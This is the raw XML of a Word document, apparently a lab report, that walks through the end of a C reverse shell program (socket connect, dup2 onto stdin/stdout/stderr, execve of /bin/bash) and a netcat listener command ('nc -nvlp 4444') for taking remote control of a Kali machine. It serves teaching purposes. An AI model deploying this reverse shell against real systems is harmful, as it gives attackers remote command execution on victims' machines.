        </w:rPr>
        <w:t>sizeof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>revsockaddr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD1FE7C" w14:textId="77777777" w:rsidR="00471383" w:rsidRPr="00B678AC" w:rsidRDefault="00471383" w:rsidP="00471383">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="621C9B42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dup2(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>sockt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>, 0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7E7D265D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dup2(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>sockt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>, 1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2235B380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dup2(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>sockt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>, 2</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0133F6C4" w14:textId="77777777" w:rsidR="00471383" w:rsidRPr="00B678AC" w:rsidRDefault="00471383" w:rsidP="00471383">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="418E78B2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char * const </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>] = {"/bin/bash", NULL};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071BC943" w14:textId="546B55DA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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>execve</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">"/bin/bash", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>, NULL);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C979BE" w14:textId="77777777" w:rsidR="00471383" w:rsidRPr="00B678AC" w:rsidRDefault="00471383" w:rsidP="00471383">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5004B0E8" w14:textId="77777777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 xml:space="preserve">    return </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>0;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="36EA30DE" w14:textId="1A11C260" w:rsidR="00471383" w:rsidRPr="00B678AC" w:rsidRDefault="00471383" w:rsidP="00471383">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365A9539" w14:textId="4C1B75F6" w:rsidR="00B22A79" w:rsidRDefault="00B22A79" w:rsidP="00471383"/>
    <w:p w14:paraId="108DC008" w14:textId="7D388D1B" w:rsidR="00B22A79" w:rsidRDefault="00B22A79" w:rsidP="00E475CA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2 main variables are required which are </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sockt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00215A8E">
        <w:t>port,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> respectively. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sockt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> variable is used to initiate a socket and port variable is used to assign the listeners port.</w:t>
      </w:r>
      <w:r w:rsidR="0055127A">
        <w:t xml:space="preserve"> In this case port 4444 is allocated</w:t>
      </w:r>
      <w:r w:rsidR="00BB0F84">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00D81FF1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D81FF1">
        <w:t>Also</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D81FF1">
        <w:t xml:space="preserve"> a struct variable called </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D81FF1">
        <w:t>revsockaddr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D81FF1">
        <w:t xml:space="preserve"> is also created which will be utilized later on in the code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF41CAE" w14:textId="0EA74FD6" w:rsidR="004A37AA" w:rsidRDefault="004A37AA" w:rsidP="00E475CA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>A socket is used to create a socket endpoint for communication.</w:t>
      </w:r>
      <w:r w:rsidR="000D1955">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>When initializing a socket 3 arguments need to</w:t>
      </w:r>
      <w:r w:rsidR="00CB7A32">
        <w:t xml:space="preserve"> be</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> satisfied namely</w:t>
      </w:r>
      <w:r w:rsidR="00CB7A32">
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7723283A" w14:textId="7E8F848F" w:rsidR="004A37AA" w:rsidRDefault="004A37AA" w:rsidP="00E475CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513A1001" w14:textId="73B24FD9" w:rsidR="004A37AA" w:rsidRDefault="004A37AA" w:rsidP="00E475CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Type of connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11197375" w14:textId="5FA27CEA" w:rsidR="004A37AA" w:rsidRDefault="004A37AA" w:rsidP="00E475CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Transmission Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EF6FF8" w14:textId="51605247" w:rsidR="00062E7E" w:rsidRDefault="00062E7E" w:rsidP="00E475CA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In this scenario to satisfy the 3 required arguments AF_INET, SOCK_STREAM and 0 are </w:t>
      </w:r>
      <w:r w:rsidR="00E475CA">
        <w:t xml:space="preserve">used, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">respectively. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336B6616" w14:textId="57549622" w:rsidR="00062E7E" w:rsidRDefault="00062E7E" w:rsidP="00E475CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>AF_INET – used to specify IPv4 connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631070F0" w14:textId="5BDE323D" w:rsidR="00062E7E" w:rsidRDefault="00062E7E" w:rsidP="00E475CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>SOCK_STREAM – used to specify a 2-way connection between client and server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763A2B98" w14:textId="50874661" w:rsidR="00062E7E" w:rsidRDefault="00062E7E" w:rsidP="00E475CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>0 – defines that the computer decides what protocol to use (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>udp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="0094273C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A3C5C3" w14:textId="443EB709" w:rsidR="00C210F9" w:rsidRDefault="00C210F9" w:rsidP="00C210F9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Now use the created structure </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>revsockaddr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in unison with 3 system calls of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netinet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>in.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> header class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35009FA6" w14:textId="3E5B8405" w:rsidR="00430DDB" w:rsidRDefault="00770AE4" w:rsidP="007430C1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00430DDB">
        <w:t>in_family</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00430DDB">
        <w:t xml:space="preserve"> – used to specify what internet protocol is being used (Ipv4 / IPv6). In this case AF_INET is used indicating the use of IPv4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001BA1AA" w14:textId="0B61C440" w:rsidR="00770AE4" w:rsidRDefault="00770AE4" w:rsidP="007430C1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sin_port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> – used to store</w:t>
      </w:r>
      <w:r w:rsidR="002B37BD">
        <w:t>/convert</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the port. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1409B122" w14:textId="52DD8720" w:rsidR="00770AE4" w:rsidRDefault="00770AE4" w:rsidP="007430C1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>htons</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> – used to convert an unsigned integer into network bytes. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650CC3A3" w14:textId="214CCCF2" w:rsidR="00C210F9" w:rsidRDefault="00EC3029" w:rsidP="007430C1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sin_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>addr.s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>_addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> – specify the internet address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5F1D22" w14:textId="5E046EA2" w:rsidR="007430C1" w:rsidRDefault="007430C1" w:rsidP="007430C1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Then use connect system call to provide a connection together with arguments </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sockt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sockaddr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000063D0">
        <w:t xml:space="preserve"> which is going to be stored in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000063D0">
        <w:t>revsockaddr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006E1391">
        <w:t xml:space="preserve"> Here the exact length of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006E1391">
        <w:t>revsockaddr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006E1391">
        <w:t xml:space="preserve"> needs to be specified which is performed using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006E1391">
        <w:t>sizeof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006E1391">
        <w:t xml:space="preserve"> system call.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B151D6F" w14:textId="72E24CC8" w:rsidR="00BA3F69" w:rsidRDefault="00BA3F69" w:rsidP="007430C1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Then dup2 commands are used which creates a copy of the file descriptor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA884AC" w14:textId="11125CDC" w:rsidR="005B1DAB" w:rsidRDefault="005B1DAB" w:rsidP="007430C1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Finally, create the constant using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">]. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>] array is a 1 dimensional array of strings in which each string is 1 of the arguments which will be passed to the program.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08811514" w14:textId="53C8BC78" w:rsidR="00A95EAB" w:rsidRDefault="00A95EAB" w:rsidP="00A95EAB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc40218015"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Compiling and running the Reverse Shell</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="56F318AA" w14:textId="3776196C" w:rsidR="008147A5" w:rsidRDefault="008147A5" w:rsidP="008147A5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In order to compile the C program a C compiler is needed. In this case </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is used which is readily available to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>complie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> C programs on GNU/Linux distributions</w:t>
      </w:r>
      <w:r w:rsidR="00D3679E">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004E030A">
        <w:t xml:space="preserve"> Once compiled, set up the listener before running the reverse shell. To do that hop over to windows command prompt to set u</w:t>
      </w:r>
      <w:r w:rsidR="00B678AC">
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="004E030A">
        <w:t xml:space="preserve"> the listener. To set up the listener</w:t>
      </w:r>
      <w:r w:rsidR="008F226B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008F226B">
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008F226B">
        <w:t xml:space="preserve"> needs to be installed on windows. With </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008F226B">
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008F226B">
        <w:t xml:space="preserve"> available execute the following command to start listening on the allocated port</w:t>
      </w:r>
      <w:r w:rsidR="00DD693B">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004E030A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A4E1EA" w14:textId="0D5650C2" w:rsidR="008F226B" w:rsidRDefault="008F226B" w:rsidP="008F226B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="008F226B">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F226B">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F226B">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>nvlp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F226B">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4364E29E" w14:textId="77777777" w:rsidR="00C15D2B" w:rsidRDefault="00C15D2B" w:rsidP="008F226B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72D9CE75" w14:textId="76C5E1E3" w:rsidR="007B29F4" w:rsidRPr="007B29F4" w:rsidRDefault="007B29F4" w:rsidP="008A1F7E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="007B29F4">
        <w:t>Now head back to the kali terminal to run the reverse shell. Now the windows command prompt should be connected and listening to the Kali system.</w:t>
      </w:r>
      <w:r w:rsidR="00697A2E">
        <w:t xml:space="preserve"> Just like executing commands via the Kali terminal it is now possible to do the same via windows command prompt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D5B416" w14:textId="77777777" w:rsidR="007B29F4" w:rsidRPr="008F226B" w:rsidRDefault="007B29F4" w:rsidP="007B29F4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58857C5B" w14:textId="77777777" w:rsidR="00062E7E" w:rsidRPr="00FA7B0D" w:rsidRDefault="00062E7E" w:rsidP="00062E7E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00062E7E" w:rsidRPr="00FA7B0D" w:rsidSect="00EB3351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153AAA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B54838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63678C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4CB89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8DD565B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5E265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DA5A0D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E974C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654504"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E788F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53512E6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="68B8E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E1E6CE8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8EB2B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FD7027C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0714D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BD05EDC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E9BC6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0E01530"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0CE03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DCE1743"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4AFAD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E585B83"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E2706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11"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="7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bEwMzcxMbQ0sTRS0lEKTi0uzszPAykwrQUAELseyywAAAA="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00EB3351"/>
    <w:rsid w:val="000063D0"/>
    <w:rsid w:val="0001026F"/>
    <w:rsid w:val="00034761"/>
    <w:rsid w:val="00041197"/>
    <w:rsid w:val="000421FC"/>
    <w:rsid w:val="00062E7E"/>
    <w:rsid w:val="000703A6"/>
    <w:rsid w:val="00075093"/>
    <w:rsid w:val="000C1B0C"/>
    <w:rsid w:val="000D1955"/>
    <w:rsid w:val="00102BCA"/>
    <w:rsid w:val="00131C4F"/>
    <w:rsid w:val="00137690"/>
    <w:rsid w:val="00141065"/>
    <w:rsid w:val="0018301E"/>
    <w:rsid w:val="001C6D38"/>
    <w:rsid w:val="001C73B1"/>
    <w:rsid w:val="00207E51"/>
    <w:rsid w:val="00215A8E"/>
    <w:rsid w:val="002315B7"/>
    <w:rsid w:val="00265AEC"/>
    <w:rsid w:val="00286DF4"/>
    <w:rsid w:val="002B2C86"/>
    <w:rsid w:val="002B37BD"/>
    <w:rsid w:val="002B482A"/>
    <w:rsid w:val="002E7EED"/>
    <w:rsid w:val="00306036"/>
    <w:rsid w:val="00322100"/>
    <w:rsid w:val="0032378B"/>
    <w:rsid w:val="00327062"/>
    <w:rsid w:val="00371BAF"/>
    <w:rsid w:val="003972C4"/>
    <w:rsid w:val="003C24B3"/>
    <w:rsid w:val="003C7CB6"/>
    <w:rsid w:val="00430DDB"/>
    <w:rsid w:val="00440DA0"/>
    <w:rsid w:val="0046005B"/>
    <w:rsid w:val="00471383"/>
    <w:rsid w:val="00484472"/>
    <w:rsid w:val="004A37AA"/>
    <w:rsid w:val="004D31BF"/>
    <w:rsid w:val="004D4599"/>
    <w:rsid w:val="004D5A61"/>
    <w:rsid w:val="004E030A"/>
    <w:rsid w:val="00520083"/>
    <w:rsid w:val="00534FD2"/>
    <w:rsid w:val="0054383B"/>
